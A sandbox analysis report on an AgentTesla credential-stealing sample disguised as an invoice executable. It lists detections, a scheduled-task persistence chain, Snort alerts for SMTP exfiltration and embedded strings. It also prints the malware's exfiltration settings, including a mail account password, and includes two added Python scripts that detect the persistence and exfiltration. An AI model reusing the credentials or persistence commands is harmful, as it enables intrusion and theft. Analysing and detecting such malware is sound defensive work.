Windows Analysis Report
Overdue invoice.exe

Overview

General Information

Sample Name: Overdue invoice.exe
Analysis ID: 635084
MD5: 21c2f8cc3f1d71ffb036ca3788a346b6
SHA1: b1f681eb0c5b406bad2414829d003568ab44982c
SHA256: 8e68ac628396cbb8619a54ffce8aedae2a20ca23e514813b70c99987175f735d
Tags: agenttesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Overdue invoice.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\Overdue invoice.exe" MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
    • schtasks.exe (PID: 7056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • yqWDN.exe (PID: 5496 cmdline: "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe" MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
    • schtasks.exe (PID: 5080 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • yqWDN.exe (PID: 5572 cmdline: {path} MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
  • yqWDN.exe (PID: 7048 cmdline: "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe" MD5: 21C2F8CC3F1D71FFB036CA3788A346B6)
  • cleanup

Malware Configuration (AgentTesla): {"Exfil Mode": "SMTP", "Username": "ashutosh@jkudyog.com", "Password": "%$#@lkjhgfdsa", "Host": "mail.jkudyog.com"}
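The process tree above shows the persistence step in the open: the sample and its dropped copy each spawn schtasks.exe with /Create, a task name under "Updates\", and an /XML definition in a throw-away %TEMP% file. The following is an added triage script, not part of the Joe Sandbox report. It runs over constructed process-creation events in a Sysmon-like shape (the field names are my own assumption, not Sysmon's schema); the command lines, paths and MD5 are taken from the report, and the benign installer event is invented for contrast.

```python
"""Triage schtasks.exe /Create launches for the persistence pattern seen in
the process tree: parent in a user-writable path, task XML in %TEMP%, task
name imitating an updater, parent hash matching the sample.

Added example; event shape and the indicator lists are assumptions.
"""
import re
from dataclasses import dataclass
from typing import List

# Assumed indicators: MD5 of the sample and its dropped copy (from the report).
KNOWN_BAD_MD5 = {"21c2f8cc3f1d71ffb036ca3788a346b6"}

# Path fragments an unprivileged user can write to (assumed list).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

TASK_NAME_RE = re.compile(r'/TN\s+"?([^"\s]+)"?', re.I)
TASK_XML_RE = re.compile(r'/XML\s+(?:"([^"]+)"|(\S+))', re.I)


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str
    parent_md5: str


def is_user_writable(path: str) -> bool:
    p = path.lower()
    return any(frag in p for frag in USER_WRITABLE)


def analyse(ev: ProcEvent) -> List[str]:
    """Return the reasons a schtasks.exe launch looks like malware persistence."""
    reasons: List[str] = []
    if not ev.image.lower().endswith("\\schtasks.exe"):
        return reasons
    if not re.search(r"/create\b", ev.cmdline, re.I):
        return reasons  # /Query, /Delete and friends are out of scope here
    m = TASK_NAME_RE.search(ev.cmdline)
    task = m.group(1) if m else ""
    m = TASK_XML_RE.search(ev.cmdline)
    xml = (m.group(1) or m.group(2)) if m else ""

    if is_user_writable(ev.parent_image):
        reasons.append(f"parent {ev.parent_image} runs from a user-writable path")
    if re.search(r"\\temp\\tmp[0-9a-f]+\.tmp$", xml, re.I):
        reasons.append(f"task definition {xml} is a throw-away %TEMP% file")
    if task.lower().startswith("updates\\"):
        reasons.append(f"task name {task} imitates an updater")
    if ev.parent_md5.lower() in KNOWN_BAD_MD5:
        reasons.append("parent hash matches the AgentTesla sample")
    return reasons


def triage(events: List[ProcEvent], threshold: int = 2) -> List[int]:
    """PIDs of schtasks launches showing at least `threshold` suspicious traits."""
    return [ev.pid for ev in events if len(analyse(ev)) >= threshold]


# Constructed events: two taken from the report's process tree, one benign installer.
EVENTS = [
    ProcEvent(
        pid=7056,
        image=r"C:\Windows\System32\schtasks.exe",
        cmdline=r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp"',
        parent_image=r"C:\Users\user\Desktop\Overdue invoice.exe",
        parent_md5="21C2F8CC3F1D71FFB036CA3788A346B6",
    ),
    ProcEvent(
        pid=5080,
        image=r"C:\Windows\System32\schtasks.exe",
        cmdline=r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp"',
        parent_image=r"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe",
        parent_md5="21C2F8CC3F1D71FFB036CA3788A346B6",
    ),
    ProcEvent(  # benign (constructed): a vendor installer registering its own updater
        pid=4120,
        image=r"C:\Windows\System32\schtasks.exe",
        cmdline=r'"C:\Windows\System32\schtasks.exe" /Create /TN "Contoso\Updater" /XML "C:\Program Files\Contoso\updater.xml"',
        parent_image=r"C:\Program Files\Contoso\setup.exe",
        parent_md5="0f343b0931126a20f133d67c2b018a3b",
    ),
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev.pid, analyse(ev))
```

The hash match is the weakest signal here because the dropped copy can be repacked at any time; the path, %TEMP% XML and task-name traits survive that, which is why `triage` flags on a count of traits rather than on the hash alone.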
Yara matches in memory dumps

Source | Rule | Description | Author
00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(37 matches in total; only the first five are shown here)
Yara matches in unpacked PE files

Source | Rule | Description | Author
16.2.yqWDN.exe.3de2e78.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
16.2.yqWDN.exe.3de2e78.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
16.2.yqWDN.exe.3de2e78.2.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  Matched strings:
  • 0x30e30:$s10: logins
  • 0x30897:$s11: credential
  • 0x2ce34:$g1: get_Clipboard
  • 0x2ce42:$g2: get_Keyboard
  • 0x2ce4f:$g3: get_Password
  • 0x2e15c:$g4: get_CtrlKeyDown
  • 0x2e16c:$g5: get_ShiftKeyDown
  • 0x2e17d:$g6: get_AltKeyDown
19.0.yqWDN.exe.400000.8.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
19.0.yqWDN.exe.400000.8.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(60 matches in total; only the first five are shown here)
No Sigma rule has matched

Snort IDS alerts:

Timestamp: 05/27/22-12:53:52.919110
Source: 192.168.2.3:49715
Destination: 206.183.111.188:587
Protocol: TCP
SID: 2840032
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-12:53:52.919010
Source: 192.168.2.3:49715
Destination: 206.183.111.188:587
Protocol: TCP
SID: 2030171
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-12:54:26.668198
Source: 192.168.2.3:49745
Destination: 206.183.111.188:587
Protocol: TCP
SID: 2030171
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-12:53:52.919010
Source: 192.168.2.3:49715
Destination: 206.183.111.188:587
Protocol: TCP
SID: 2839723
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-12:54:26.668311
Source: 192.168.2.3:49745
Destination: 206.183.111.188:587
Protocol: TCP
SID: 2840032
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-12:54:26.668198
Source: 192.168.2.3:49745
Destination: 206.183.111.188:587
Protocol: TCP
SID: 2839723
Classtype: A Network Trojan was detected

AV Detection

Source: 19.0.yqWDN.exe.400000.6.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "ashutosh@jkudyog.com", "Password": "%$#@lkjhgfdsa", "Host": "mail.jkudyog.com"}
Source: Overdue invoice.exe | Virustotal: Detection: 60%
Source: Overdue invoice.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | ReversingLabs: Detection: 60%
Source: Overdue invoice.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe | Joe Sandbox ML: detected
Source: 19.0.yqWDN.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 19.0.yqWDN.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.0.Overdue invoice.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.0.Overdue invoice.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.0.Overdue invoice.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 19.0.yqWDN.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 19.2.yqWDN.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 19.0.yqWDN.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.2.Overdue invoice.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.0.Overdue invoice.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 19.0.yqWDN.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.0.Overdue invoice.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: Overdue invoice.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Overdue invoice.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking

Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49715 -> 206.183.111.188:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49715 -> 206.183.111.188:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49715 -> 206.183.111.188:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49745 -> 206.183.111.188:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49745 -> 206.183.111.188:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49745 -> 206.183.111.188:587
Source: Joe Sandbox View | ASN Name: WEBWERKS-AS-INWebWerksIndiaPvtLtdIN
Source: Joe Sandbox View | IP Address: 206.183.111.188
Source: global traffic | TCP traffic: 192.168.2.3:49715 -> 206.183.111.188:587
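Every Snort hit above is the same behaviour: a workstation opening a TCP session to port 587 on an Internet host right after resolving the mail host from the extracted configuration. That pattern can be caught without a signature, because ordinary workstations do not speak SMTP submission to the Internet at all. The following is an added example, not from the report: it runs over constructed flow and DNS records in a Zeek-like shape (the field names are my own, not Zeek's schema), using the report's indicators 206.183.111.188 and mail.jkudyog.com; MAIL_RELAYS is an assumed list of the organisation's sanctioned outbound mail servers.

```python
"""Flag SMTP-submission sessions from workstations straight to the Internet,
then enrich them with the report's IOCs and a preceding DNS lookup.

Added example; record shape, MAIL_RELAYS and the sample data are assumptions.
"""
import ipaddress
from typing import Dict, List

IOC_IPS = {"206.183.111.188"}        # report: exfil destination
IOC_DOMAINS = {"mail.jkudyog.com"}   # report: DNS query and config "Host"
MAIL_RELAYS = {"10.0.0.25"}          # assumption: the only hosts allowed to send mail outbound
SUBMISSION_PORTS = {25, 465, 587}
DNS_WINDOW_S = 120.0                 # a lookup this recent is tied to the connection


def _internal(ip: str) -> bool:
    return ipaddress.ip_address(ip).is_private


def find_exfil(flows: List[Dict], dns: List[Dict]) -> List[Dict]:
    """Return one finding per workstation-to-Internet SMTP session."""
    findings = []
    for f in flows:
        if f["proto"] != "tcp" or f["dport"] not in SUBMISSION_PORTS:
            continue
        src, dst = f["src"], f["dst"]
        if not _internal(src) or _internal(dst) or dst in MAIL_RELAYS:
            continue  # inbound, internal, or via the sanctioned relay
        reasons = [f"{src} sends SMTP directly to {dst}:{f['dport']}"]
        if dst in IOC_IPS:
            reasons.append("destination matches the AgentTesla exfil IOC")
        for q in dns:  # was the destination resolved from a known bad name just before?
            if (q["src"] == src and q["query"] in IOC_DOMAINS
                    and 0 <= f["ts"] - q["ts"] <= DNS_WINDOW_S):
                reasons.append(f"preceded by a lookup of {q['query']}")
                break
        findings.append({
            "src": src,
            "dst": dst,
            "severity": "high" if len(reasons) > 1 else "medium",
            "reasons": reasons,
        })
    return findings


# Constructed records. Timestamps are seconds, addresses other than the
# report's 192.168.2.3 and 206.183.111.188 are made up.
DNS = [
    {"ts": 1000.0, "src": "192.168.2.3", "query": "mail.jkudyog.com"},
    {"ts": 1005.0, "src": "192.168.2.7", "query": "www.example.com"},
]
FLOWS = [
    {"ts": 1001.5, "src": "192.168.2.3", "dst": "206.183.111.188", "dport": 587, "proto": "tcp"},
    {"ts": 1010.0, "src": "192.168.2.7", "dst": "93.184.216.34", "dport": 443, "proto": "tcp"},
    {"ts": 1020.0, "src": "192.168.2.9", "dst": "10.0.0.25", "dport": 587, "proto": "tcp"},   # via relay: fine
    {"ts": 1030.0, "src": "192.168.2.9", "dst": "185.199.110.1", "dport": 25, "proto": "tcp"},  # direct: flag
]

if __name__ == "__main__":
    for finding in find_exfil(FLOWS, DNS):
        print(finding)
```

The behavioural rule fires on the unknown host as well as on the known one; the IOC and DNS enrichment only decide how loudly. Note that `ipaddress.is_private` treats the RFC 5737 documentation ranges as private, so use real public addresses when you build your own test data.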
Source: Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://dWZLeu.com
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Overdue invoice.exe, 00000007.00000002.522968890.0000000003760000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.jkudyog.com
Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Overdue invoice.exe, 00000000.00000003.265415364.000000000590A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.agfamonotype.
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Overdue invoice.exe, 00000000.00000003.259988892.0000000005908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/3C
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Overdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260841728.0000000005935000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Overdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlP
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com=
Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comB.TTFlC
Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comals
Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comd
Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comdC
Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comdc
Source: Overdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comepko
Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comessed
Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comlicF
Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comm
Source: Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.como
Source: Overdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comoGC
Source: Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comttoF
Source: Overdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: Overdue invoice.exe, 00000000.00000003.253007661.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253040437.000000000591B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.comn
Source: Overdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn//:
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/l
Source: Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cne-d
Source: Overdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254953312.000000000590B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnoO
Source: Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnt-ia
Source: Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnz
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Overdue invoice.exe, 00000000.00000003.252984688.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252856713.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252888263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253011774.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252782511.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253067018.0000000005924000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252808922.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253115594.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252958098.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr$A
Source: Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr=
Source: Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.krF1
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253859484.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253816400.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253456642.000000000591B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: Overdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.comc
Source: Overdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.comh
Source: Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
